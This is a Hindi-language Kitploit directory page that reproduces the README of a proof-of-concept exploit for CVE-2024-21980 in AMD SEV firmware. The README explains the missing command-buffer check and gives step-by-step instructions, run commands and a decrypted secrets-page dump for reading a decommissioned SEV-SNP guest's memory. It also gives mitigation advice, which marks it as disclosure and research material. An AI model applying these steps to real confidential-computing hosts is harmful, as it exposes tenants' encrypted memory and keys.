Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2024-21980-poc — CVE-2024-21980 के लिए शोषण जो AMD SEV फर्मवेयर को लक्षित करता है, सेवामुक्त किए गए SEV-SNP मेहमानों की मनमानी मेमोरी को कमांड बफर प्रवर्तन बायपास के माध्यम से डिक्रिप्ट करने के लिए। | Kitploit
उपकरण/GitHubGitHub/freax13/cve-2024-21980-poc
एन्क्रिप्शन/डिक्रिप्शन उपकरणभेद्यता विश्लेषणशोषणहार्डवेयर सुरक्षापेलोड डेवलपमेंटबाइनरी शोषण
GitHubfreax13/cve-2024-21980-poc

cve-2024-21980-poc

CVE-2024-21980 के लिए शोषण जो AMD SEV फर्मवेयर को लक्षित करता है, सेवामुक्त किए गए SEV-SNP मेहमानों की मनमानी मेमोरी को कमांड बफर प्रवर्तन बायपास के माध्यम से डिक्रिप्ट करने के लिए।

रिपॉजिटरी देखें
812 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SEV फर्मवेयर भेद्यता

इस रिपॉजिटरी में SEV फर्मवेयर में एक भेद्यता के लिए एक शोषण (exploit) शामिल है। यह शोषण एक SEV-SNP अतिथि के डिकमीशन होने के बाद उसकी मनमानी मेमोरी को डिक्रिप्ट करने की अनुमति देता है।

संस्करण 1.55.16 (लेखन के समय नवीनतम) पर परीक्षण किया गया।

मूल कारण

SEV फर्मवेयर में master_handler_table नाम की एक तालिका होती है जिसमें सभी कमांड के लिए फंक्शन पॉइंटर्स के साथ-साथ कमांड से संबंधित कुछ और गुण होते हैं। उन दो अतिरिक्त गुणों में से दो हैं cmd_buf_type और snp_cmd_buf_enforcement। cmd_buf_type यह निर्धारित करता है कि कमांड बफर को होस्ट मेमोरी से/में कॉपी किया जाना चाहिए या नहीं। snp_cmd_buf_enforcement यह निर्धारित करता है कि क्या ये कॉपी ऑपरेशन उन जांचों के अधीन होने चाहिए जो यह सत्यापित करते हैं कि कमांड बफर का बैकअप लेने वाली मेमोरी FIRMWARE या DEFAULT स्थिति में है। वे कमांड जिनके लिए cmd_buf_type या तो CMD_BUF_OUTPUT_ONLY, CMD_BUF_INPUT_AND_OUTPUT, या CMD_BUF_INPUT_AND_OUTPUT_ERROR है, उन सभी के लिए snp_cmd_buf_enforcement को true पर सेट किया जाना चाहिए। अन्यथा कमांड आउटपुट को वापस लिखने से RMP कवर किए गए क्षेत्र के अंदर मेमोरी भ्रष्टाचार हो सकता है। snp_cmd_buf_enforcement ऐसे सभी कमांड के लिए true है, एक अपवाद को छोड़कर - SEV_MCMD_ID_ATTESTATION: इस कमांड का cmd_buf_type CMD_BUF_INPUT_AND_OUTPUT_ERROR पर सेट है, लेकिन इसका snp_cmd_buf_enforcement भी false पर सेट है। परिणामस्वरूप, RMP-कवर मेमोरी की ओर इशारा करते हुए कमांड बफर के साथ SEV_MCMD_ID_ATTESTATION को निष्पादित करना संभव है और आउटपुट वापस लिखे जाने पर वह मेमोरी दूषित हो जाती है।

मैं नहीं देखता कि SEV_MCMD_ID_ATTESTATION को अपवाद होने की आवश्यकता क्यों होगी, मुझे लगता है कि यह एक टाइपो/कॉपी-पेस्ट गलती हो सकती है।

शोषण

SEV_MCMD_ID_ATTESTATION कमांड बफर में केवल एक फ़ील्ड length (4 बाइट्स) में लिखता है और इसलिए केवल वे बाइट्स ही हैं जिनका उपयोग हम मेमोरी को दूषित करने के लिए कर सकते हैं। SEV_MCMD_ID_ATTESTATION हमेशा एक ही मान लिखता है - 0x000000d0। सौभाग्य से, कमांड बफर पर कोई संरेखण आवश्यकता नहीं है और इसलिए हम बड़ी सन्निहित मेमोरी को दूषित करने के लिए कमांड बफर को बार-बार स्थानांतरित कर सकते हैं। हम इसका उपयोग एक स्थिर पैटर्न के साथ गेस्ट कॉन्टेक्स्ट पेज के पहले 16 बाइट्स को दूषित करने के लिए करेंगे। उन पहले 16 बाइट्स में UMC की सीड होती है और इसलिए इसे एक स्थिर मान पर बाध्य करके, हम गेस्ट की एन्क्रिप्शन कुंजी को एक स्थिर मान पर बाध्य कर सकते हैं।

यहां प्रदान किया गया शोषण SWPSIRT-2684/CVE-2023-31355 के लिए मेरे द्वारा प्रदान किए गए शोषण पर भारी रूप से आधारित है।

भेद्यता का शोषण करने के लिए हम निम्नलिखित चरणों का पालन कर सकते हैं:

  1. एक SEV या SEV-ES अतिथि लॉन्च करें। यह SEV_MCMD_ID_ATTESTATION के लिए आवश्यक है। इस अतिथि को चालू रखें।
  2. पीड़ित अतिथि के लिए पते 0x2000 पर एक गेस्ट कॉन्टेक्स्ट पेज बनाएं। RMP कवर क्षेत्र में कोई भी अन्य पता भी काम करेगा, हालांकि डीबगिंग के लिए एक निश्चित पता उपयोगी है।
  3. पीड़ित अतिथि के UMC की सीड को दूषित करने के लिए भेद्यता का उपयोग करें।
  4. पीड़ित अतिथि कॉन्टेक्स्ट पेज को सक्रिय करें और पीड़ित अतिथि को लॉन्च और चलाएं।
  5. पीड़ित अतिथि को डिकमीशन करें।
  6. हमलावर अतिथि के लिए पते 0x2000 पर एक गेस्ट कॉन्टेक्स्ट पेज बनाएं। यह चरण 1 में उपयोग किया गया वही पता होना चाहिए।
  7. हमलावर अतिथि के UMC की सीड को दूषित करने के लिए भेद्यता का उपयोग करें।
  8. हमलावर अतिथि कॉन्टेक्स्ट पेज को सक्रिय करें और डीबग फ़्लैग सक्षम करके लॉन्च करें।
  9. पीड़ित अतिथि की मेमोरी को हमलावर अतिथि को असाइन करें।
  10. हमलावर अतिथि के कॉन्टेक्स्ट पेज का उपयोग करके पीड़ित अतिथि की मेमोरी को डिक्रिप्ट करने के लिए SNP_DBG_ENCRYPT कमांड का उपयोग करें। यह सफल होगा क्योंकि पीड़ित अतिथि और हमलावर अतिथि एक UMC की सीड साझा करते हैं।

प्रभाव

यहां प्रभाव कम से कम SWPSIRT-2684 जितना ही होना चाहिए। इस समय मेरे लिए यह स्पष्ट नहीं है कि क्या इस बग का उपयोग डिकमीशन होने से पहले एक चल रहे अतिथि की मेमोरी को डिक्रिप्ट करने के लिए किया जा सकता है।

शमन

snp_cmd_buf_enforcement को SEV_MCMD_ID_ATTESTATION के लिए true पर सेट किया जाना चाहिए।

दिलचस्प बात यह है कि Linux KVM होस्ट समर्थन पैच को अपडेट करने की आवश्यकता नहीं है क्योंकि वे पहले से ही SEV_CMD_ATTESTATION_REPORT को sev_cmd_buf_writable में एक कमांड के रूप में सूचीबद्ध करते हैं, जिसके लिए आवश्यक है कि इसका कमांड बफर FIRMWARE स्थिति में हो। अन्य हाइपरवाइज़रों के लिए परिवर्तनों की आवश्यकता हो भी सकती है और नहीं भी।

PoC उपयोग

  1. BIOS में RMP कवर किए गए क्षेत्र को 64GiB (0x10000 1-MiB पेज) में बदलें। यदि आपका सिस्टम इसका समर्थन नहीं करता है, तो Linux पैच को तदनुसार समायोजित करना होगा। PoC का परीक्षण 128GiB मेमोरी वाले सिस्टम पर किया गया है।
  2. linux-patches फ़ोल्डर में पैच को https://github.com/AMDESE/linux/commits/snp-host-v10 के शीर्ष पर लागू करें। कर्नेल बनाएं, इंस्टॉल करें और बूट करें।
  3. एक SEV या SEV-ES अतिथि लॉन्च करें और इसे चालू रखें।
  4. एक पीड़ित SEV-SNP अतिथि लॉन्च करें।
  5. पीड़ित अतिथि को रोकें।
  6. लॉन्च के दौरान बनाए गए गुप्त पृष्ठ (secret page) का स्थान खोजने के लिए कर्नेल लॉग का निरीक्षण करें।
    root@kitploit:~
    root@server:~# dmesg | grep "kvm_amd: Detected secret page"
    [  463.851449] kvm_amd: Detected secret page at pfn 171a24
    
  7. PoC चलाएं।
    root@kitploit:~
    root@server:~/firmware-vuln-poc# cargo run -- --pfn 0x171a24 
        Finished dev [unoptimized + debuginfo] target(s) in 0.03s
    Creating VM with identical UMC key seed
    Raw page:
    000: 0300000000000000110fa00000000000000000000000000000000000a98d95ff
    020: 29d761f0c5bdc1b4b4a69fd2f37c829ca6d30d439252f7daefd72fcd45262053
    040: 3c10be491d825e35ea4166261486e417187c679efcc2d2be8553f32c2c62bbf3
    060: 27ac6d99214a2ce1fc37d35a94475ff377e67caacc43add86e908a9369207343
    080: 14c197ffbcfade378bd1b33819051d5d3628b5eb71a0b84daefed27671e8e202
    0a0: 0000000000000000000000000000000000000000000000000000000000000000
    0c0: 0000000000000000000000000000000000000000000000000000000000000000
    0e0: 0000000000000000000000000000000000000000000000000000000000000000
    100: 000000000080008800000000eeff0000f0ffffffffffffffff3f000000000000
    120: 0000000000000000000000000000000000000000000000000000000000000000
    140: 0000000000000000000000000000000000000000000000000000000000000000
    160: c800000000000000000000000000000000000000000000000000000000000000
    180: 0000000000000000000000000000000000000000000000000000000000000000
    1a0: 0000000000000000000000000000000000000000000000000000000000000000
    1c0: 0000000000000000000000000000000000000000000000000000000000000000
    1e0: 0000000000000000000000000000000000000000000000000000000000000000
    200: 0000000000000000000000000000000000000000000000000000000000000000
    220: 0000000000000000000000000000000000000000000000000000000000000000
    240: 0000000000000000000000000000000000000000000000000000000000000000
    260: 0000000000000000000000000000000000000000000000000000000000000000
    280: 0000000000000000000000000000000000000000000000000000000000000000
    2a0: 0000000000000000000000000000000000000000000000000000000000000000
    2c0: 0000000000000000000000000000000000000000000000000000000000000000
    2e0: 0000000000000000000000000000000000000000000000000000000000000000
    300: 0000000000000000000000000000000000000000000000000000000000000000
    320: 0000000000000000000000000000000000000000000000000000000000000000
    340: 0000000000000000000000000000000000000000000000000000000000000000
    360: 0000000000000000000000000000000000000000000000000000000000000000
    380: 0000000000000000000000000000000000000000000000000000000000000000
    3a0: 0000000000000000000000000000000000000000000000000000000000000000
    3c0: 0000000000000000000000000000000000000000000000000000000000000000
    3e0: 0000000000000000000000000000000000000000000000000000000000000000
    400: 0000000000000000000000000000000000000000000000000000000000000000
    420: 0000000000000000000000000000000000000000000000000000000000000000
    440: 0000000000000000000000000000000000000000000000000000000000000000
    460: 0000000000000000000000000000000000000000000000000000000000000000
    480: 0000000000000000000000000000000000000000000000000000000000000000
    4a0: 0000000000000000000000000000000000000000000000000000000000000000
    4c0: 0000000000000000000000000000000000000000000000000000000000000000
    4e0: 0000000000000000000000000000000000000000000000000000000000000000
    500: 0000000000000000000000000000000000000000000000000000000000000000
    520: 0000000000000000000000000000000000000000000000000000000000000000
    540: 0000000000000000000000000000000000000000000000000000000000000000
    560: 0000000000000000000000000000000000000000000000000000000000000000
    580: 0000000000000000000000000000000000000000000000000000000000000000
    5a0: 0000000000000000000000000000000000000000000000000000000000000000
    5c0: 0000000000000000000000000000000000000000000000000000000000000000
    5e0: 0000000000000000000000000000000000000000000000000000000000000000
    600: 0000000000000000000000000000000000000000000000000000000000000000
    620: 0000000000000000000000000000000000000000000000000000000000000000
    640: 0000000000000000000000000000000000000000000000000000000000000000
    660: 0000000000000000000000000000000000000000000000000000000000000000
    680: 0000000000000000000000000000000000000000000000000000000000000000
    6a0: 0000000000000000000000000000000000000000000000000000000000000000
    6c0: 0000000000000000000000000000000000000000000000000000000000000000
    6e0: 0000000000000000000000000000000000000000000000000000000000000000
    700: 0000000000000000000000000000000000000000000000000000000000000000
    720: 0000000000000000000000000000000000000000000000000000000000000000
    740: 0000000000000000000000000000000000000000000000000000000000000000
    760: 0000000000000000000000000000000000000000000000000000000000000000
    780: 0000000000000000000000000000000000000000000000000000000000000000
    7a0: 0000000000000000000000000000000000000000000000000000000000000000
    7c0: 0000000000000000000000000000000000000000000000000000000000000000
    7e0: 0000000000000000000000000000000000000000000000000000000000000000
    800: 0000000000000000000000000000000000000000000000000000000000000000
    820: 0000000000000000000000000000000000000000000000000000000000000000
    840: 0000000000000000000000000000000000000000000000000000000000000000
    860: 0000000000000000000000000000000000000000000000000000000000000000
    880: 0000000000000000000000000000000000000000000000000000000000000000
    8a0: 0000000000000000000000000000000000000000000000000000000000000000
    8c0: 0000000000000000000000000000000000000000000000000000000000000000
    8e0: 0000000000000000000000000000000000000000000000000000000000000000
    900: 0000000000000000000000000000000000000000000000000000000000000000
    920: 0000000000000000000000000000000000000000000000000000000000000000
    940: 0000000000000000000000000000000000000000000000000000000000000000
    960: 0000000000000000000000000000000000000000000000000000000000000000
    980: 0000000000000000000000000000000000000000000000000000000000000000
    9a0: 0000000000000000000000000000000000000000000000000000000000000000
    9c0: 0000000000000000000000000000000000000000000000000000000000000000
    9e0: 0000000000000000000000000000000000000000000000000000000000000000
    a00: 0000000000000000000000000000000000000000000000000000000000000000
    a20: 0000000000000000000000000000000000000000000000000000000000000000
    a40: 0000000000000000000000000000000000000000000000000000000000000000
    a60: 0000000000000000000000000000000000000000000000000000000000000000
    a80: 0000000000000000000000000000000000000000000000000000000000000000
    aa0: 0000000000000000000000000000000000000000000000000000000000000000
    ac0: 0000000000000000000000000000000000000000000000000000000000000000
    ae0: 0000000000000000000000000000000000000000000000000000000000000000
    b00: 0000000000000000000000000000000000000000000000000000000000000000
    b20: 0000000000000000000000000000000000000000000000000000000000000000
    b40: 0000000000000000000000000000000000000000000000000000000000000000
    b60: 0000000000000000000000000000000000000000000000000000000000000000
    b80: 0000000000000000000000000000000000000000000000000000000000000000
    ba0: 0000000000000000000000000000000000000000000000000000000000000000
    bc0: 0000000000000000000000000000000000000000000000000000000000000000
    be0: 0000000000000000000000000000000000000000000000000000000000000000
    c00: 0000000000000000000000000000000000000000000000000000000000000000
    c20: 0000000000000000000000000000000000000000000000000000000000000000
    c40: 0000000000000000000000000000000000000000000000000000000000000000
    c60: 0000000000000000000000000000000000000000000000000000000000000000
    c80: 0000000000000000000000000000000000000000000000000000000000000000
    ca0: 0000000000000000000000000000000000000000000000000000000000000000
    cc0: 0000000000000000000000000000000000000000000000000000000000000000
    ce0: 0000000000000000000000000000000000000000000000000000000000000000
    d00: 0000000000000000000000000000000000000000000000000000000000000000
    d20: 0000000000000000000000000000000000000000000000000000000000000000
    d40: 0000000000000000000000000000000000000000000000000000000000000000
    d60: 0000000000000000000000000000000000000000000000000000000000000000
    d80: 0000000000000000000000000000000000000000000000000000000000000000
    da0: 0000000000000000000000000000000000000000000000000000000000000000
    dc0: 0000000000000000000000000000000000000000000000000000000000000000
    de0: 0000000000000000000000000000000000000000000000000000000000000000
    e00: 0000000000000000000000000000000000000000000000000000000000000000
    e20: 0000000000000000000000000000000000000000000000000000000000000000
    e40: 0000000000000000000000000000000000000000000000000000000000000000
    e60: 0000000000000000000000000000000000000000000000000000000000000000
    e80: 0000000000000000000000000000000000000000000000000000000000000000
    ea0: 0000000000000000000000000000000000000000000000000000000000000000
    ec0: 0000000000000000000000000000000000000000000000000000000000000000
    ee0: 0000000000000000000000000000000000000000000000000000000000000000
    f00: 0000000000000000000000000000000000000000000000000000000000000000
    f20: 0000000000000000000000000000000000000000000000000000000000000000
    f40: 0000000000000000000000000000000000000000000000000000000000000000
    f60: 0000000000000000000000000000000000000000000000000000000000000000
    f80: 0000000000000000000000000000000000000000000000000000000000000000
    fa0: 0000000000000000000000000000000000000000000000000000000000000000
    fc0: 0000000000000000000000000000000000000000000000000000000000000000
    fe0: 0000000000000000000000000000000000000000000000000000000000000000
    
    Secrets page:
    imi_en: false
    FMS: 00a00f11
    gosvw: 000000000000000000000000a98d95ff
    vmpck0: 29d761f0c5bdc1b4b4a69fd2f37c829ca6d30d439252f7daefd72fcd45262053
    vmpck1: 3c10be491d825e35ea4166261486e417187c679efcc2d2be8553f32c2c62bbf3
    vmpck2: 27ac6d99214a2ce1fc37d35a94475ff377e67caacc43add86e908a9369207343
    vmpck3: 14c197ffbcfade378bd1b33819051d5d3628b5eb71a0b84daefed27671e8e202
    VMSA tweak bitmap: 000000000080008800000000eeff0000f0ffffffffffffffff3f0000000000000000000000000000000000000000000000000000000000000000000000000000
    tsc_factor: 200
    

ध्यान दें कि गुप्त पृष्ठों के बारे में कुछ खास नहीं है, इस शोषण का उपयोग सामान्य पृष्ठों को डिक्रिप्ट करने के लिए भी किया जा सकता है। PoC में गुप्त पृष्ठों का उपयोग इसलिए किया जाता है क्योंकि उनमें बहुत पहचानने योग्य सामग्री होती है जिससे यह देखना आसान हो जाता है कि पीड़ित मेमोरी का डिक्रिप्शन सफल हुआ है।

टूल डाउनलोड करें